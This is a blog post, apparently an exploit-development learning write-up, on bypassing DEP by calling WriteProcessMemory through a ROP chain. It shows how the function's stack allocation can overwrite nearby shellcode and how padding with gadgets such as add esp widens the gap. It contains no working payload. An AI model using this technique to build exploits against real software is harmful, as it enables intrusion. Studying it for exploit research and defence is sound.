Bypassing DEP - Increasing the Gap
This blog talks about how to use WriteProcessMemory API Call for executing shellcode in a scenario where there is very less gap between shellcode and WriteProcessMemory call skeleton
In this blog, I have documented a yet another less known way to perform DEP Bypass using WriteProcessMemory API Call in a scenario where your shellcode is of large size but you have very less space for shellcode insertion. We will talk on how you can use part of ROP chain's space for your shellcode to make sure that during the WriteProcessMemory API Operation, there is no shellcode corruption.
The following is the function defination of WriteProcessMemory API Call :-
WriteProcessMemory API Call takes 5 arguments. First one being the handle to Process which indicates the handle of process where lpBuffer needs to be written. This defaults to -1 for current process. Next is lpBaseAddress which is basically the destination address for copying bytes. Next we have lpBuffer which is source address i.e address from where bytes will be copied from. Next we have nSize which is the number of bytes to be copied. Finally we have lpNumberOfBytesWritten which indicates address where WriteProcessMemory will write the number of bytes it was able to successfully copy. This address must be writeable.
Vulnerable Application
Moving, on lets assume a scenario where an application is vulnerable to Buffer overflow. Now, the EIP overwrite happens at say 451th byte in Input buffer and the total bytes that needs to be sent to trigger the overflow are 750 bytes. In such case input would look like below :-
Input buffer = "A"*450 + "B"*4 + "C"*(750-430-4)
In this case, once we send the above input to vulnerable application, it would overwrite the EIP with 0x42424242
and crash the program. We also verify that application is compiled with DEP protection and hence would involve ROP chains to execute shellcode.
Let's assume that our shellcode is of size 410 bytes. In such case, we would be sending shellcode along with As. Now, the input would look like below :-
Input buffer = shellcode + "A"*(450-410) + "B"*4 + "C"*316
Now, let's create the skeleton for WriteProcessMemory API Call.
Now, the input would look something like below (Size of wp is 28) :-
Input buffer = shellcode + "A"*12 + wp + EIP + <ROP Chain>
A question to readers, does the above input structure looks safe in context of shellcode corruption, when we write ROP chains to make EIP point to start of wp after patching wp at runtime via ROP Chains?
If you answered NO, then great work. You identified a potential Rabbit hole and saved yourself some time.
Well, if you answered YES, then you just dropped into a rabbit hole like me :) . Let's talk why.
Journey down the Rabbit Hole
To understand the issue, lets deep dive into assembly of WriteProcessMemory Function.
Lets skim through the WriteProcessMemory method in kernelbase. As shown above we see a sub esp, 30
instruction which is basically allocating stack for WriteProcessMemory's operations. The function's prolouge is followed by multiple push statements which are performing stack operations.
Recall that our input buffer was of format
input buffer = shellcode + "A" * 12 + wp + EIP + ROP
Moment EIP reaches the start of wp after executing our ROP Gadgets, it would jump directly into WriteProcessMemory function. To help understand, lets assume that the address of wp's start is 0x5000000
. The input looks something like this in address space :-
Now, before executing WriteProcessMemory API Call, ESP would be pointing to start of wp (Read basics of ROP Chains on why). When it starts the execution of WriteProcessMemory ESP still points at same address. Now when EIP reaches address 0x755f3995
in WriteProcessMemory, ESP still points to 0x5000000
. Now, moment EIP executes 0x755f3995
, i.e sub esp,30
makes ESP = 0x4ffffd0
. As you might have guessed, this is where problem starts.
Since there is not enough space between end of shellcode and start of wp, ESP ended up pointing inside our shellcode. Subsequent push instructions will go and corrupt our shellcode failing our exploit.
Now, that we understood the rabbit hole, lets find a way out.
Getting out of Rabbit Hole
The basic idea is to increase the space between end of shellcode and start of wp so that ESP does't end up inside our shellcode. We can do something interesting over here.
Suggested input structure :-
Input buffer = shellcode + "A"*12 + EIP + <dummy instructions to increase gap between shellcode and wp> + wp + rop
The above proposed input structure basically uses dummy instructions to increase gap between shellcode and wp. We can use gadgets like xor eax,eax
or any non-destructive instructions to increase this gap. But this come's with a trade off. It ends up eating our space for ROP Chains. The greater the number of dummy instructions, the less space left for ROP Chain.
One trick to smartly workaround this is to use instructions like add esp,0x20
which instead of using dummy instruction, adds esp right away increasing the gap between shellcode and ESP. This would require less dummy instructions and can help us land right into ROP Chains. With proper stack alignment this can be used to make EIP point to start of our ROP chains rather than somewhere in between.
Conclusion
This trick was discovered by me during my learning process. I have not come across much blogs explaining the workaround the size restrictions so thought it might be a good idea to share this with community. Contact me on Twitter for any feedbacks.
Thanks!
Last updated